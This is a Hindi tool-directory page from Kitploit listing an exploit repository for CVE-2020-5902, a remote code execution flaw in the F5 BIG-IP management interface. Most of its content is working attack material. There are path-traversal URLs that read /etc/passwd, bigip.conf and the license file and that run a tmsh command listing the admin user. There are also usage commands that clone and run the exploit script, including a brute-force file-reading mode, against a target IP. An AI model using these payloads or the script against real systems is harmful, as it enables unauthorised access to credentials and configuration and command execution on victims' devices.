Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-5902 — F5-Big-IP (CVE-2020-5902) के लिए शोषण कोड | Kitploit
उपकरण/GitHubGitHub/yasserjanah/cve-2020-5902
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubyasserjanah/cve-2020-5902

CVE-2020-5902

F5-Big-IP (CVE-2020-5902) के लिए शोषण कोड

रिपॉजिटरी देखें
431513 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-5902

F5-Big-IP (CVE-2020-5902) के लिए एक्सप्लॉइट कोड

सारांश

BIG-IP संस्करण 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, और 11.6.1-11.6.5.1 में, ट्रैफ़िक मैनेजमेंट यूज़र इंटरफ़ेस (TMUI), जिसे कॉन्फ़िगरेशन यूटिलिटी भी कहा जाता है, में अज्ञात पृष्ठों पर एक रिमोट कोड एक्सीक्यूशन (RCE) कमज़ोरी है।

अवधारणा प्रमाण

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

उपयोग

root@kitploit:~
$ git clone https://github.com/yasserjanah/CVE-2020-5902
root@kitploit:~
$ cd CVE-2020-5902/
root@kitploit:~
$ pip3 install -r ./requirements.txt
root@kitploit:~
$ python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd

-b वर्डलिस्ट से फ़ाइलों को ब्रूट फोर्स करने के लिए

root@kitploit:~
$ python3 exploit-CVE-2020-5902.py -ip <IP> -b
टूल डाउनलोड करें